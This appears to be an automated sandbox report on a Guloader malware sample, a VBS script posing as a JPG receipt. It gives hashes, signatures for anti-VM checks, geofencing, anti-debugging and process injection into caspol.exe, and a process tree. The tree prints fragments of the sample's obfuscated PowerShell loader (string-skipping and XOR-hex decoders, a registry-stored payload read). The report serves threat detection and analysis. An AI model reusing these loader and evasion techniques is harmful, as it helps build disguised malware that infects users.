Analysis
- max time kernel: 91s
- max time network: 137s
- platform: windows10-2004_x64
- resource: win10v2004-20221111-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 02-02-2023 11:29
Static task: static1
Behavioral task: behavioral1
- Sample: reciept_ 0014010303102_JPG.vbs
- Resource: win7-20221111-en
Behavioral task: behavioral2
- Sample: reciept_ 0014010303102_JPG.vbs
- Resource: win10v2004-20221111-en
General
- Target: reciept_ 0014010303102_JPG.vbs
- Size: 411KB
- MD5: d26b9137f31c1c7296ea710bd71b3a59
- SHA1: b37fcfde9230d8854a8bedb13203beffeb71df21
- SHA256: 33146615b36e5718c7e8e69269f3c5cdf3ec72b525e24550da62b360f1360d30
- SHA512: ae88914f39a5b695003d77fe1d1bc06b3302f3956ed597125ab0f81f998b35019ec49320de833ed4201cccb98651a3e97ed142d38a84d3a4ebb1706bd8ab9ad6
- SSDEEP: 6144:JCj1ltFlJ1KxZheePFmYAcM2qQLIcK6wa31LBygR9T8nMs85HaUb4bWPJxxRBtps:Uj7tHP+3zzqVcK6egj4MJ5HaUbhv3ps
Malware Config
Signatures
-
Guloader, Cloudeye
A shellcode based downloader first seen in 2020.
-
Checks QEMU agent file (2 TTPs, 2 IoCs)
Checks presence of QEMU agent, possibly to detect virtualization.
Processes:
powershell.exe, caspol.exe
description | ioc | process
File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | powershell.exe
File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | caspol.exe
-
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | WScript.exe
-
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
29 | api.ipify.org
30 | api.ipify.org
-
Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
Processes:
caspol.exe
pid | process
4852 | caspol.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
Processes:
powershell.exe, caspol.exe
pid | process
2948 | powershell.exe
4852 | caspol.exe
-
Suspicious use of SetThreadContext (1 IoCs)
Processes:
powershell.exe
description | pid | process | target process
PID 2948 set thread context of 4852 | 2948 | powershell.exe | caspol.exe
-
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash (1 IoCs)
Processes:
WerFault.exe
pid | pid_target | process | target process
1492 | 4852 | WerFault.exe | caspol.exe
-
Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes:
powershell.exe, powershell.exe, powershell.exe
pid | process
1412 | powershell.exe
1412 | powershell.exe
1452 | powershell.exe
1452 | powershell.exe
2948 | powershell.exe
2948 | powershell.exe
-
Suspicious behavior: MapViewOfSection (1 IoCs)
Processes:
powershell.exe
pid | process
2948 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken (4 IoCs)
Processes:
powershell.exe, powershell.exe, powershell.exe, caspol.exe
description | pid | process
Token: SeDebugPrivilege | 1412 | powershell.exe
Token: SeDebugPrivilege | 1452 | powershell.exe
Token: SeDebugPrivilege | 2948 | powershell.exe
Token: SeDebugPrivilege | 4852 | caspol.exe
-
Suspicious use of WriteProcessMemory (12 IoCs)
Processes:
WScript.exe, powershell.exe, powershell.exe, powershell.exe
description | pid | process | target process
PID 4212 wrote to memory of 1412 | 4212 | WScript.exe | powershell.exe
PID 4212 wrote to memory of 1412 | 4212 | WScript.exe | powershell.exe
PID 1412 wrote to memory of 1452 | 1412 | powershell.exe | powershell.exe
PID 1412 wrote to memory of 1452 | 1412 | powershell.exe | powershell.exe
PID 1412 wrote to memory of 1452 | 1412 | powershell.exe | powershell.exe
PID 1452 wrote to memory of 2948 | 1452 | powershell.exe | powershell.exe
PID 1452 wrote to memory of 2948 | 1452 | powershell.exe | powershell.exe
PID 1452 wrote to memory of 2948 | 1452 | powershell.exe | powershell.exe
PID 2948 wrote to memory of 4852 | 2948 | powershell.exe | caspol.exe
PID 2948 wrote to memory of 4852 | 2948 | powershell.exe | caspol.exe
PID 2948 wrote to memory of 4852 | 2948 | powershell.exe | caspol.exe
PID 2948 wrote to memory of 4852 | 2948 | powershell.exe | caspol.exe
Processes
-
C:\Windows\System32\WScript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\reciept_ 0014010303102_JPG.vbs" 1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$pretincture = """[obfuscated script body omitted]""";Function Aziminobenzene9 { param([String]$Berthed); For($pharaohs=2; $pharaohs -lt $Berthed.Length-1; $pharaohs+=(2+1)){ $Raafrugts = $Raafrugts + $Tyrannophobia + $Berthed.Substring($pharaohs, 1); } $Raafrugts;}$Limpidity0 = Aziminobenzene9 'DiIBoEReXSu ';$Limpidity1= Aziminobenzene9 $pretincture;if([IntPtr]::size -eq 8){START-job { param($gagmen) powershell $gagmen } -RunAs32 -Argument $Limpidity1 | wait-job | Receive-Job;}else{&$Limpidity0 $Limpidity1;};;;" 2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile 3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Berthed); $Skydedrs = $Berthed.Length; $Recommending = New-Object byte[] ($Skydedrs / 2); For($pharaohs=0; $pharaohs -lt $Berthed.Length; $pharaohs+=2){ $Recommending[$pharaohs/2] = [convert]::ToByte($Berthed.Substring($pharaohs, 2), 16); $Recommending[$pharaohs/2] = ($Recommending[$pharaohs/2] -bxor 71); } [String][System.Text.Encoding]::ASCII.GetString($Recommending);}[hex-encoded strings omitted]$Aziminobenzene=(Get-ItemProperty -Path 'HKCU:\Toment\forviklingerne').Shibboletternes;[hex-encoded strings omitted]#" 4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe" 5⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 2476 6⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4852 -ip 4852 1⤵
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize: 57KB
MD5: 6c73df1bb0c83bf158c1aebc058fbdd2
SHA1: c3f64dbe2337cf4be331efaed86e600076d613cf
SHA256: 2bfd8c972f6bb05ae1adca5237a7210d569fb1f9662ad4dd6bfc4e00e88d17ba
SHA512: a9093e7a6808cbe9aa86eb9eb1d50513e942800da5ffc9685c670a34d2349019caa65705dcd6e959de4b066673e3c45b64b5a94b7589c057817ec61eb65188e6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e